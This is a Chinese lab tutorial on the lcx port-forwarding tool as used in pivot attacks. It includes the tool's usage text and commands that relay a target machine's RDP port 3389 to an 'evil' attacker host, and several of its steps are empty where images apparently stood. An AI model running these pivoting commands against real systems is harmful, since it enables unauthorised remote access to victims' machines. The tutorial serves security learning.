标签：端口 LCX lcx 转发 服务端 客户端

跳板攻击之：lcx 端口转发

郑重声明：
本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。

• 跳板攻击之：lcx 端口转发
  • 1 lcx 端口转发原理
  • 2 实验环境
  • 3 配置服务端
  • 4 配置客户端

1 lcx 端口转发原理

1. LCX项目地址：windworst/LCX: My LCX, PortMaper. used in Windows,Linux,Android,Mac (github.com)

lcx 是基于 Socket 套接字实现的端口转发工具，Windows 版本名称为 LCX、Linux 版本为 portmap。

一个基本的 Socket 隧道必须包含两端：

1. 服务端：监听一个端口，等待客户端连接
2. 客户端：通过传入服务端的 IP 地址和端口，与服务端建立连接。

lcx.exe -h
[Usage of Packet Transmit:]
 lcx.exe -<listen|tran|slave> <option> [-log logfile]

[option:]
 -listen <ConnectPort> <TransmitPort>
 -tran   <ConnectPort> <TransmitHost> <TransmitPort> # 经测试无法过 nat 有点鸡肋。
 -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

2 实验环境

3 配置服务端

• 在 evil 主机上，将本机 4444 端口上监听的所有数据转发到本地的 13389 端口上

lcx.exe -listen 4444 13389

4 配置客户端

• 首先准备好一个具有公网 ip 的服务器，假定域名或者公网 ip 是 192.168.0.21
• 在目标机器上将 3389 端口的所有数据转发到恶意主机的 4444 端口上。

1. 配置 LCX 端口转发

   .\lcx.exe -slave 192.168.0.110 4444 127.0.0.1 3389
   

   

2. 客户端与服务端建立通信连接

   

3. 与远程主机建立远程桌面连接

   • 客户端：

     

   • 服务端：

     

4. 抓包查看流量特征

   

标签：端口,LCX,lcx,转发,服务端,客户端
来源： https://www.cnblogs.com/f-carey/p/16613954.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。